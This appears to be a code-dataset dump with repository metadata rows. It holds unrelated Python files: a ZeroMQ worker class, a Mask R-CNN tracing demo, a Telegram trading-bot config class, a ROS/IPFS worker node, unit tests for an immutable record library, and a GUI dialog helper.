self.socket: zmq.asyncio.Socket = socket
self.jobs_queue: Queue = Queue() # queue of jobs to be processed
self.model_name: Optional[str] = None # current model name
self.model_version: Optional[str] = None # current model version
self.sheep_data_root: Optional[str] = sheep_data_root
self.in_progress: set = set() # set of job_ids which are currently sent for processing to the sheep's runner
def _load_model(self, model_name: str, model_version: str) -> None:
"""Tell the sheep to prepare a new model (without restarting)."""
self.model_name = model_name
self.model_version = model_version
def start(self, model_name: str, model_version: str) -> None:
"""
(Re)start the sheep with the given model name and version.
Any unfinished jobs will be lost, socket connection will be reset.
:param model_name: model name
:param model_version: model version
"""
if self.running:
self.slaughter()
self._load_model(model_name, model_version)
self.in_progress = set()
self.socket.connect("tcp://0.0.0.0:{}".format(self._config.port))
def slaughter(self) -> None:
zmq_address = 'tcp://0.0.0.0:{}'.format(self._config.port)
try:
self.socket.disconnect(zmq_address)
except ZMQBaseError:
logging.warning('Failed to disconnect socket (perhaps it was not started/connected)')
@property
@abc.abstractmethod
def running(self) -> bool:
"""Is the sheep running, i.e. capable of accepting computation requests?"""
| 37.463768 | 117 | 0.667311 | 334 | 2,585 | 5.04491 | 0.377246 | 0.053412 | 0.038576 | 0.023739 | 0.163205 | 0.073591 | 0.073591 | 0.073591 | 0.032047 | 0 | 0 | 0.004063 | 0.238298 | 2,585 | 68 | 118 | 38.014706 | 0.851701 | 0.286654 | 0 | 0 | 0 | 0 | 0.05668 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d9040f536e5e7d98863330b02abf8e1540d41786 | 7,340 | py | Python | demo/trace.py | nicolasCruzW21/maskrcnn-Tracing | da648eb09f7034faa7b29a48543d777d05968d82 | [
"MIT"
] | 3 | 2020-06-10T04:37:01.000Z | 2021-12-20T07:45:48.000Z | demo/trace.py | nicolasCruzW21/maskrcnn-Tracing | da648eb09f7034faa7b29a48543d777d05968d82 | [
"MIT"
] | 1 | 2020-06-17T09:05:31.000Z | 2021-09-13T09:16:36.000Z | demo/trace.py | nicolasCruzW21/maskrcnn-Tracing | da648eb09f7034faa7b29a48543d777d05968d82 | [
"MIT"
] | 1 | 2020-07-06T05:47:12.000Z | 2020-07-06T05:47:12.000Z | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import argparse
import cv2
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
import torch
import time
from PIL import Image
import numpy
from matplotlib import pyplot
def combine_masks_tuple(input_model):
# type: (Tuple[Tensor, Tensor, Tensor, Tensor, Tensor,Tensor]) -> Tensor
image_with_mask, bboxes, labels, masks, scores,palette=input_model
threshold=0.5
padding=1
contour=True
rectangle=False
height = 800
width = 800
#image_with_mask = image.clone()
for i in range(masks.size(0)):
color = ((palette * labels[i]) % 255).to(torch.uint8)
one_mask = my_paste_mask(masks[i, 0], bboxes[i], height, width, threshold, padding, contour, rectangle)
image_with_mask = torch.where(one_mask.unsqueeze(-1), color.unsqueeze(0).unsqueeze(0), image_with_mask)
return image_with_mask
def processImage(name,size, model):
pil_image =Image.open(name).convert("RGB")
pil_image = pil_image.resize((size, size), Image.BILINEAR)
image = torch.from_numpy(numpy.array(pil_image)[:, :, [2, 1, 0]])
image = (image.float()).permute(2, 0, 1) - torch.tensor(cfg.INPUT.PIXEL_MEAN)[:, None, None]
ImageFinal = image.unsqueeze(0).to(model.device)
return ImageFinal
def processImageCPU(name,size, model):
image2 =Image.open(name).convert("RGB")
image2 = image2.resize((size, size), Image.BILINEAR)
image2 = torch.from_numpy(numpy.array(image2)[:, :, [2, 1, 0]])
return image2
def my_paste_mask(mask, bbox, height, width, threshold=0.5, padding=1, contour=False, rectangle=False):
# type: (Tensor, Tensor, int, int, float, int, bool, bool) -> Tensor
padded_mask = torch.constant_pad_nd(mask, (padding, padding, padding, padding))
#print("mask.size(-1)",mask.size(-1))
scale = 1.0 + 2.0 * float(padding) / float(mask.size(-1))
#print("scale",scale)
center_x = (bbox[2] + bbox[0]) * 0.5
center_y = (bbox[3] + bbox[1]) * 0.5
w_2 = (bbox[2] - bbox[0]) * 0.5 * scale
h_2 = (bbox[3] - bbox[1]) * 0.5 * scale # should have two scales?
bbox_scaled = torch.stack([center_x - w_2, center_y - h_2,
center_x + w_2, center_y + h_2], 0)
TO_REMOVE = 1
w = (bbox_scaled[2] - bbox_scaled[0] + TO_REMOVE).clamp(min=1).long()
h = (bbox_scaled[3] - bbox_scaled[1] + TO_REMOVE).clamp(min=1).long()
scaled_mask = torch.ops.maskrcnn_benchmark.upsample_bilinear(padded_mask.float(), h, w)
x0 = bbox_scaled[0].long()
y0 = bbox_scaled[1].long()
x = x0.clamp(min=0)
y = y0.clamp(min=0)
#print("scaled_mask",scaled_mask.size())
leftcrop = x - x0
topcrop = y - y0
w = torch.min(w - leftcrop, width - x)
h = torch.min(h - topcrop, height - y)
#print("h",h,"w",w)
#mask = torch.zeros((height, width), dtype=torch.uint8)
#mask[y:y + h, x:x + w] = (scaled_mask[topcrop:topcrop + h, leftcrop:leftcrop + w] > threshold)
mask = torch.constant_pad_nd((scaled_mask[topcrop:topcrop + h, leftcrop:leftcrop + w] > threshold),
(int(x), int(width - x - w), int(y), int(height - y - h))) # int for the script compiler
if contour:
mask = mask.float()
# poor person's contour finding by comparing to smoothed
mask = (mask - torch.nn.functional.conv2d(mask.unsqueeze(0).unsqueeze(0),
torch.full((1, 1, 3, 3), 1.0 / 9.0), padding=1)[0, 0]).abs() > 0.001
if rectangle:
x = torch.arange(width, dtype=torch.long).unsqueeze(0)
y = torch.arange(height, dtype=torch.long).unsqueeze(1)
r = bbox.long()
# work around script not liking bitwise ops
rectangle_mask = ((((x == r[0]) + (x == r[2])) * (y >= r[1]) * (y <= r[3]))
+ (((y == r[1]) + (y == r[3])) * (x >= r[0]) * (x <= r[2])))
mask = (mask + rectangle_mask).clamp(max=1)
#print(mask.size())
return mask
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Webcam Demo")
parser.add_argument(
"--config-file",
default="../configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for the prediction to be shown",
)
parser.add_argument(
"--min-image-size",
type=int,
default=224,
help="Smallest size of the image to feed to the model. "
"Model was trained with 800, which gives best results",
)
parser.add_argument(
"--show-mask-heatmaps",
dest="show_mask_heatmaps",
help="Show a heatmap probability for the top masks-per-dim masks",
action="store_true",
)
parser.add_argument(
"--masks-per-dim",
type=int,
default=2,
help="Number of heatmaps per dimension to show",
)
parser.add_argument(
"opts",
help="Modify model config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
# load config from file and command-line arguments
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
# prepare object that handles inference plus adds predictions on top of image
coco_demo = COCODemo(
cfg,
confidence_threshold=args.confidence_threshold,
show_mask_heatmaps=args.show_mask_heatmaps,
masks_per_dim=args.masks_per_dim,
min_image_size=args.min_image_size,
)
start_time = time.time()
image = processImage("test.jpg",800,coco_demo)
image2 = processImageCPU("test.jpg",800,coco_demo)
coco_demo.single_image_to_top_predictions(image)
for p in coco_demo.model.parameters():
p.requires_grad_(False)
coco_demo.model = coco_demo.model.eval()
with torch.jit.optimized_execution(False):
traced_model = torch.jit.trace(coco_demo.single_image_to_top_predictions, image, check_trace=False)
traced_model.save('traced.pt')
print("done tracing")
print("testing first image:")
loaded = torch.jit.load("traced.pt")
boxes, labels, masks, scores = loaded(image)
palette=torch.tensor([3, 32767, 2097151])
input_model=image2.cpu().squeeze(0), boxes.to(coco_demo.cpu_device), labels.to(coco_demo.cpu_device), masks.to(coco_demo.cpu_device), scores.to(coco_demo.cpu_device), palette
result_image1 = combine_masks_tuple(input_model)
pyplot.imshow(result_image1[:, :, [2, 1, 0]])
pyplot.show()
print("testing second image:")
image = processImage("test2.jpg",800,coco_demo)
image2 = processImageCPU("test2.jpg",800,coco_demo)
boxes, labels, masks, scores = loaded(image)
palette=torch.tensor([3, 32767, 2097151])
input_model=image2.cpu().squeeze(0), boxes.to(coco_demo.cpu_device), labels.to(coco_demo.cpu_device), masks.to(coco_demo.cpu_device), scores.to(coco_demo.cpu_device), palette
result_image1 = combine_masks_tuple(input_model)
pyplot.imshow(result_image1[:, :, [2, 1, 0]])
pyplot.show()
if __name__ == "__main__":
main()
| 38.229167 | 178 | 0.639646 | 1,033 | 7,340 | 4.38819 | 0.247822 | 0.031767 | 0.017648 | 0.022943 | 0.287889 | 0.229429 | 0.168101 | 0.168101 | 0.14251 | 0.120009 | 0 | 0.032421 | 0.218392 | 7,340 | 191 | 179 | 38.429319 | 0.757713 | 0.107902 | 0 | 0.134228 | 0 | 0 | 0.098622 | 0.011792 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033557 | false | 0 | 0.060403 | 0 | 0.120805 | 0.020134 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d904b9c8e847f19331cc7dff09301eaaa05f6fd5 | 5,275 | py | Python | src/config.py | tfhkzp/telegram_follow_trader | ea32ba63d230d7244967d57a1cb8ade608e2761a | [
"MIT"
] | 1 | 2020-12-17T16:51:27.000Z | 2020-12-17T16:51:27.000Z | src/config.py | tfhkzp/telegram_follow_trader | ea32ba63d230d7244967d57a1cb8ade608e2761a | [
"MIT"
] | null | null | null | src/config.py | tfhkzp/telegram_follow_trader | ea32ba63d230d7244967d57a1cb8ade608e2761a | [
"MIT"
] | null | null | null | import os
from configparser import RawConfigParser
import constants
import utils
class Config(RawConfigParser):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.disclaimer_section_header = "disclaimer"
self.telegram_section_header = "telegram"
self.telegram_dialog_section_header = "telegram_dialog_setting"
self.trade_account_section_header = "trade_account_setting"
self.trade_section_header = "trade_setting"
self.telegram_dialog_setting_prefix = "telegram_dialog_"
self.file_path = utils.get_dir_path_by_platform() + "setting.ini"
self.create_setting_file_when_not_exists()
self.read(self.file_path)
def create_setting_file_when_not_exists(self):
if not os.path.exists(self.file_path):
self[self.disclaimer_section_header] = {
'disclaimer_version': 'LOCAL',
'understand_and_agree': 'N'
}
self[self.telegram_section_header] = {
'api_id': '',
'api_hash': '',
'phone_number': ''
}
self[self.telegram_dialog_section_header] = {
'default_dialog_id': ''
}
self[self.trade_account_section_header] = {
'port': 11111
}
self[self.trade_section_header] = {
'trade_mode': constants.TradeMode.FIXED_QUANTITY,
'trade_product_hsi': 'Y',
'trade_product_mhi': 'N',
'hsi_trade_quantity': 1,
'mhi_trade_quantity': 1,
'hsi_margin': 150000,
'mhi_margin': 30000,
'trade_period_morning': 'Y',
'trade_period_afternoon': 'Y',
'trade_period_night': 'Y',
'open_extra_price': 0,
'close_price_adjust_interval': 1,
'cancel_unfulfilled_order_after_second': 10,
'trade_only_within_second': 3,
'manual_confirm_trade_message': 'Y'
}
self.save()
def get(self, section, code):
try:
return super().get(section, code)
except:
self.set(section, code, "")
self.save()
return ""
def save(self):
self.write(open(self.file_path, 'w'))
def get_disclaimer_version(self):
return self.get(self.disclaimer_section_header, "disclaimer_version")
def save_disclaimer_version(self, value):
self.set(self.disclaimer_section_header, "disclaimer_version", value)
self.save()
def get_disclaimer_understand_and_agree(self):
return self.get(self.disclaimer_section_header, "understand_and_agree")
def save_disclaimer_understand_and_agree(self, value):
self.set(self.disclaimer_section_header, "understand_and_agree", value)
self.save()
def save_telegram_dialog_setting(self, dialog_id, open_buy_template, close_buy_template, open_sell_template,
close_sell_template, time_format):
self[self.telegram_dialog_setting_prefix + str(dialog_id)] = {
'open_buy_template': open_buy_template,
'close_buy_template': close_buy_template,
'open_sell_template': open_sell_template,
'close_sell_template': close_sell_template,
'time_format': time_format
}
def get_telegram_dialog_setting(self, dialog_id):
try:
section_header = self.telegram_dialog_setting_prefix + str(dialog_id)
open_buy_template = self.get(section_header, 'open_buy_template')
close_buy_template = self.get(section_header, 'close_buy_template')
open_sell_template = self.get(section_header, 'open_sell_template')
close_sell_template = self.get(section_header, 'close_sell_template')
time_format = self.get(section_header, 'time_format')
return {
'open_buy_template': open_buy_template,
'close_buy_template': close_buy_template,
'open_sell_template': open_sell_template,
'close_sell_template': close_sell_template,
'time_format': time_format
}
except:
return None
def get_default_telegram_dialog_id(self):
return self.get(self.telegram_dialog_section_header, "default_dialog_id")
def save_default_telegram_dialog_id(self, value):
self.set(self.telegram_dialog_section_header, "default_dialog_id", value)
self.save()
def get_trade_port(self):
return self.get(self.trade_account_section_header, "port")
def save_trade_port(self, value):
self.set(self.trade_account_section_header, "port", value)
self.save()
def get_telegram_setting(self, code):
return self.get(self.telegram_section_header, code)
def set_telegram_setting(self, code, value):
self.set(self.telegram_section_header, code, value)
def get_trade_setting(self, code):
return self.get(self.trade_section_header, code)
def set_trade_setting(self, code, value):
self.set(self.trade_section_header, code, value)
| 39.074074 | 112 | 0.630711 | 595 | 5,275 | 5.161345 | 0.171429 | 0.118528 | 0.041029 | 0.052752 | 0.64409 | 0.477043 | 0.327906 | 0.24422 | 0.128623 | 0.128623 | 0 | 0.006023 | 0.276019 | 5,275 | 134 | 113 | 39.365672 | 0.798115 | 0 | 0 | 0.175439 | 0 | 0 | 0.162844 | 0.034502 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.035088 | 0.052632 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d908ab4f59b016aac181ee4e124679993f2e35d0 | 1,579 | py | Python | 05_open_sensor_data/scripts/worker.py | Vourhey/robonomics_tutorials | 3dd7ad5db9037f0c681b93ebe1fdfca46ef9761d | [
"BSD-3-Clause"
] | 1 | 2020-02-10T17:27:46.000Z | 2020-02-10T17:27:46.000Z | 05_open_sensor_data/scripts/worker.py | Vourhey/robonomics_tutorials | 3dd7ad5db9037f0c681b93ebe1fdfca46ef9761d | [
"BSD-3-Clause"
] | null | null | null | 05_open_sensor_data/scripts/worker.py | Vourhey/robonomics_tutorials | 3dd7ad5db9037f0c681b93ebe1fdfca46ef9761d | [
"BSD-3-Clause"
] | 1 | 2020-04-30T06:48:26.000Z | 2020-04-30T06:48:26.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ROS
import rospy
from std_msgs.msg import String
# Robonomics communication
from robonomics_msgs.msg import Demand, Result
from ipfs_common.msg import Multihash
from ipfs_common.ipfs_rosbag import IpfsRosBag
class WorkerNode:
def __init__(self):
rospy.init_node("worker_node")
rospy.loginfo("Launching worker node...")
rospy.Subscriber('/liability/infochan/incoming/demand', Demand, self.on_incoming_demand)
self.result_publish = rospy.Publisher('/liability/infochan/eth/signing/result', Result, queue_size=128)
rospy.loginfo("The node is launched")
def on_incoming_demand(self, demand: Demand):
rospy.loginfo("Incoming demand: {}".format(demand))
if demand.model.multihash == rospy.get_param("~model"):
self.send_result(demand)
else:
rospy.loginfo("Demand is not for me")
def pack_result(self) -> Multihash:
topics = {
"/data": [
String("Hello from my sensor!")
]
}
bag = IpfsRosBag(messages=topics)
return bag.multihash
def send_result(self, demand: Demand):
rospy.loginfo("Collecting data...")
res = Result()
res.liability = demand.sender
res.result = self.pack_result()
res.success = True
rospy.loginfo("Result: {}".format(res))
self.result_publish.publish(res)
def spin(self):
rospy.spin()
if __name__ == "__main__":
WorkerNode().spin()
| 26.762712 | 111 | 0.624446 | 180 | 1,579 | 5.305556 | 0.416667 | 0.075393 | 0.027225 | 0.041885 | 0.058639 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004263 | 0.257125 | 1,579 | 58 | 112 | 27.224138 | 0.809889 | 0.045598 | 0 | 0 | 0 | 0 | 0.156458 | 0.048602 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.131579 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90aaafe7f9c1c206b79ec748e75d1bc2e4fe249 | 14,009 | py | Python | dubplate/tests/test_dubplate.py | GreenBuildingRegistry/dubplate | 5bb11abfd17c557a7be63acfb1ede7834ea17b88 | [
"MIT"
] | 1 | 2018-04-20T08:33:40.000Z | 2018-04-20T08:33:40.000Z | dubplate/tests/test_dubplate.py | GreenBuildingRegistry/dubplate | 5bb11abfd17c557a7be63acfb1ede7834ea17b88 | [
"MIT"
] | null | null | null | dubplate/tests/test_dubplate.py | GreenBuildingRegistry/dubplate | 5bb11abfd17c557a7be63acfb1ede7834ea17b88 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
copyright (c) 2016-2017 Earth Advantage. All rights reserved.
..codeauthor::Paul Munday <paul@paulmunday.net>
Unit tests for dubplate.
"""
# Imports from Standard Library
import datetime
import json
import sys
import six
import unittest
# Imports from Third Party Modules
from frozendict import frozendict
# Local Imports
from dubplate import Record, empty_slot
PY3 = sys.version_info[0] == 3
if PY3:
from unittest import mock
else:
import mock
# Constants
NS = 'http://example.org/ns'
NAMESPACE = {'n': NS}
class TstRecord(Record):
# pylint:disable=slots-on-old-class,too-few-public-methods
__slots__ = ['service', 'test']
def __init__(self, service, test, **kwargs):
self.service = service
self.test = test
super(TstRecord, self).__init__(**kwargs)
class FieldRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
fields = ('a', 'b', 'c')
non_null_fields = ('a', 'b')
class RequiredFieldRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
non_null_fields = ('a', 'b')
class RequireAllFieldsRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
fields = ('a', 'b', 'c')
non_null_fields = ('a', 'b')
require_all_fields = True
class HashIndexRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
hash_index_fields = ('a', 'b')
class HashIndexSlotsRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
hash_index_fields = ('test', 'a', 'b')
class RecordTests(unittest.TestCase):
"""Test base record class"""
def setUp(self):
self.rdict = {'color': 'red', 'number': 10}
self.record = TstRecord('service', 'test', **self.rdict)
def test_record_access(self):
# test attributes and record data set
self.assertEqual(self.record.test, 'test')
self.assertEqual(self.record['color'], 'red')
# test difference between attributes and record data
with self.assertRaises(KeyError) as conm:
# pylint:disable=pointless-statement
self.record['test']
self.assertEqual(str(conm.exception), "'test'")
with self.assertRaises(AttributeError) as conm:
# pylint:disable=pointless-statement,no-member
self.record.color
self.assertEqual(
str(conm.exception), "'TstRecord' object has no attribute 'color'"
)
def test_is_immutable(self):
with self.assertRaises(TypeError) as conm:
self.record.test = 1
self.assertEqual(
str(conm.exception),
"'TstRecord' object does not support attribute assignment"
)
with self.assertRaises(TypeError) as conm:
self.record['number'] = 1
self.assertEqual(
str(conm.exception),
"'TstRecord' object does not support item assignment"
)
with self.assertRaises(TypeError) as conm:
del self.record.test
self.assertEqual(
str(conm.exception),
"'TstRecord' object does not support attribute deletion"
)
with self.assertRaises(TypeError) as conm:
del self.record['number']
self.assertEqual(
str(conm.exception),
"'TstRecord' object does not support item deletion"
)
def test_repr(self):
# TODO: the dict portion makes this test intermittently problematic
# self.assertEqual(
# repr(self.record), "<TstRecord, {'color': 'red', 'number': 10}>"
# )
pass
def test_dict_like(self):
self.assertIn('color', self.record)
self.assertNotIn('test', self.record)
self.assertEqual(self.record, {'color': 'red', 'number': 10})
self.assertNotEqual(self.record, {'color': 'red', 'number': 1})
self.assertEqual(len(self.record), 2)
# hash is hash of record
fdt = frozendict({'color': 'red', 'number': 10})
self.assertEqual(hash(self.record), hash(fdt))
self.assertEqual(self.record.get('color', 'blue'), 'red')
self.assertNotEqual(self.record.get('color', 'blue'), 'blue')
self.assertEqual(self.record.get('other', 'blue'), 'blue')
six.assertCountEqual(
self,
list(self.record.items()), [('color', 'red'), ('number', 10)]
)
self.assertDictEqual(
{'color': 'red', 'number': 10},
{key: val for key, val in self.record.items()}
)
six.assertCountEqual(
self,
['color', 'number'], list(self.record.keys())
)
six.assertCountEqual(
self,
['color', 'number'], [key for key in self.record.keys()]
)
six.assertCountEqual(
self,
['red', 10], list(self.record.values())
)
six.assertCountEqual(
self,
['red', 10], [value for value in self.record.values()]
)
def test_non_null_fields(self):
# raises error if attribute not set
with self.assertRaises(KeyError) as conm:
RequiredFieldRecord('red', 1, a=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following field is required: b'"
)
with self.assertRaises(KeyError) as conm:
RequiredFieldRecord('red', 1, d=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following fields are required: a, b'"
)
# raises errror if required field is None
with self.assertRaises(KeyError) as conm:
RequiredFieldRecord('red', 1, a=2, b=None)
self.assertEqual(
str(conm.exception),
"'The following field can not be None: b'"
)
with self.assertRaises(KeyError) as conm:
RequiredFieldRecord('red', 1, a=None, b=None)
self.assertEqual(
str(conm.exception),
"'The following fields can not be None: a, b'"
)
# ok to set extra fields if fields not defined
rec = RequiredFieldRecord('red', 1, a=1, b=2, c=3)
# if we are here no error raised
assert rec
def test_fields(self):
# test rejects extra fields
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, b=3, c=4, d=5)
self.assertEqual(
str(conm.exception),
"'Extra keys: d. "
"Only the following keys can be used in the record: a, b, c'"
)
# test ok
rec = FieldRecord('red', 1, a=2, b=3, c=4)
assert rec
# test ok for non-required fields to be None
rec = FieldRecord('red', 1, a=2, b=3, c=None)
assert rec
# test required fields
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following field is required: b'"
)
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, d=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following fields are required: a, b'"
)
# raises errror if required field is None
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, b=None, c=None)
self.assertEqual(
str(conm.exception),
"'The following field can not be None: b'"
)
# test ordering
rec = FieldRecord('red', 1, a=2, c=4, b=3)
expected = ['a', 'b', 'c']
result = [key for key in rec.keys()]
self.assertEqual(expected, result)
def test_require_all_fields(self):
# test requires all fields
with self.assertRaises(KeyError) as conm:
RequireAllFieldsRecord('red', 1, a=2, b=3)
self.assertEqual(
str(conm.exception),
"'Missing keys: c. "
"The following keys must be used in the record: a, b, c'"
)
# test rejects extra fields
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, b=3, c=4, d=5)
self.assertEqual(
str(conm.exception),
"'Extra keys: d. "
"Only the following keys can be used in the record: a, b, c'"
)
# test ok
rec = FieldRecord('red', 1, a=2, b=3, c=4)
assert rec
# test ok for non-required fields to be None
rec = FieldRecord('red', 1, a=2, b=3, c=None)
assert rec
# test required fields
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following field is required: b'"
)
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, d=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following fields are required: a, b'"
)
# raises errror if required field is None
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, b=None, c=None)
self.assertEqual(
str(conm.exception),
"'The following field can not be None: b'"
)
# test ordering
rec = FieldRecord('red', 1, a=2, c=4, b=3)
expected = ['a', 'b', 'c']
result = [key for key in rec.keys()]
self.assertEqual(expected, result)
def test_copy_record(self):
"""Test copy_record method"""
copy = self.record.copy_record()
self.assertEqual(copy, self.rdict)
copy = self.record.copy_record(color='green')
self.assertEqual(copy, {'color': 'green', 'number': 10})
# ensure extra/incorrect fields can't be set
record = FieldRecord('red', 1, a=2, b=3, c=4)
self.assertRaises(
KeyError, record.copy_record, colorx='green'
)
# ensure non-null fields can't be set to None
self.assertRaises(
KeyError, record.copy_record, a=None
)
def test_json(self):
"""Test json() method"""
dtime = datetime.datetime(2001, 1, 1, 1, 1, 1, 100)
date = datetime.date(2001, 1, 1)
json_record = TstRecord(
service='service', test='test',
string='test', integer=1,
datetime=dtime, date=date,
lst=[dtime, date],
tpl=(dtime, date),
dictionary=dict(datetime=dtime, date=date)
)
dtime_str = '2001-01-01T01:01:01'
date_str = '2001-01-01'
result = json_record.json()
self.assertIsInstance(result, str)
result = json.loads(result)
self.assertNotIn('service', result)
self.assertNotIn('test', result)
self.assertEqual(result['string'], 'test')
self.assertIsInstance(result['integer'], int)
self.assertEqual(result['integer'], 1)
self.assertEqual(result['datetime'], dtime_str)
self.assertEqual(result['date'], date_str)
self.assertEqual(result['lst'], [dtime_str, date_str])
self.assertEqual(result['tpl'], [dtime_str, date_str])
result = result['dictionary']
self.assertIsInstance(result, dict)
self.assertEqual(result['datetime'], dtime_str)
self.assertEqual(result['date'], date_str)
json_record2 = TstRecord(
service='service', test='test',
record=json_record
)
result = json_record2.json()
self.assertIsInstance(result, str)
result = json.loads(result)
self.assertNotIn('service', result)
self.assertNotIn('test', result)
result = result['record']
self.assertIsInstance(result, dict)
self.assertNotIn('service', result)
self.assertNotIn('test', result)
self.assertEqual(result['string'], 'test')
self.assertIsInstance(result['integer'], int)
self.assertEqual(result['integer'], 1)
self.assertEqual(result['datetime'], dtime_str)
self.assertEqual(result['date'], date_str)
self.assertEqual(result['lst'], [dtime_str, date_str])
self.assertEqual(result['tpl'], [dtime_str, date_str])
result = result['dictionary']
self.assertIsInstance(result, dict)
self.assertEqual(result['datetime'], dtime_str)
self.assertEqual(result['date'], date_str)
def test_empty_slot(self):
"""Test empty_slot"""
service = getattr(TstRecord, 'service')
self.assertTrue(isinstance(service, empty_slot))
@mock.patch('dubplate.generate_hash_index_key')
def test_get_hash_index_key(self, mock_hash_index_key):
"""Test get_hash_index_key"""
mock_hash_index_key.return_value = ''
rec = TstRecord('service', 'test', a=1, b=2)
rec.get_hash_index_key()
mock_hash_index_key.assert_called_with(
rec.__class__.__name__, [], rec
)
fields_rec = FieldRecord('service', 'test', a=1, b=2)
fields_rec.get_hash_index_key()
mock_hash_index_key.assert_called_with(
fields_rec.__class__.__name__, fields_rec.fields, fields_rec
)
hash_rec = HashIndexRecord('service', 'test', a=1, b=2)
hash_rec.get_hash_index_key()
mock_hash_index_key.assert_called_with(
hash_rec.__class__.__name__, hash_rec.hash_index_fields, hash_rec
)
slot_rec = HashIndexSlotsRecord('service', 'test', a=1, b=2)
slot_rec.get_hash_index_key()
expected_val_dict = frozendict({'test': 'test', 'a': 1, 'b': 2})
mock_hash_index_key.assert_called_with(
slot_rec.__class__.__name__, slot_rec.hash_index_fields,
expected_val_dict
)
| 31.551802 | 78 | 0.585766 | 1,665 | 14,009 | 4.821622 | 0.135135 | 0.087818 | 0.047334 | 0.052068 | 0.655207 | 0.595416 | 0.53986 | 0.522671 | 0.500747 | 0.477578 | 0 | 0.015841 | 0.288029 | 14,009 | 443 | 79 | 31.623025 | 0.789052 | 0.115497 | 0 | 0.481967 | 0 | 0 | 0.124848 | 0.002598 | 0 | 0 | 0 | 0.002257 | 0.327869 | 1 | 0.042623 | false | 0.003279 | 0.029508 | 0 | 0.12459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90b2d6635c836ba8cc887d96866eaefa439a024 | 1,582 | py | Python | gui.py | quintenroets/gui | d53461771f847805be533d96dcceb4f10f9ec9d7 | [
"MIT"
] | null | null | null | gui.py | quintenroets/gui | d53461771f847805be533d96dcceb4f10f9ec9d7 | [
"MIT"
] | null | null | null | gui.py | quintenroets/gui | d53461771f847805be533d96dcceb4f10f9ec9d7 | [
"MIT"
] | null | null | null | import subprocess
import cli
def ask(message, choices=None, options=None):
options = {"text": f"<big>{message}</big>"} | (options or {})
if choices is None:
res = run("entry", options=options)
res = res and res.strip()
elif isinstance(choices, list):
res = ask_choices(choices, options=options)
elif isinstance(choices, dict):
res = ask_choices(list(choices.keys()), options=options)
res = res and choices[res]
else:
raise Exception("Choices parameter not valid")
return res
def ask_choices(choices, options=None):
display_mapping = {
c[:100]: c for c in choices
} # limit length of displayed options to prevent errors
separator = "###"
options = {"separator": separator, "no-headers": None} | (options or {})
items = ["--column=text", "--column=@font@"] + [
v for c in display_mapping for v in (c, "Monospace 15")
]
res = run("list", args=items, options=options)
res = res and res.split(separator)[0]
res = res and display_mapping[res]
return res
def run(subcommand, args=None, options=None):
args = args or []
options = {
"geometry": "907x514+500+200",
"title": "",
"text-align": "center",
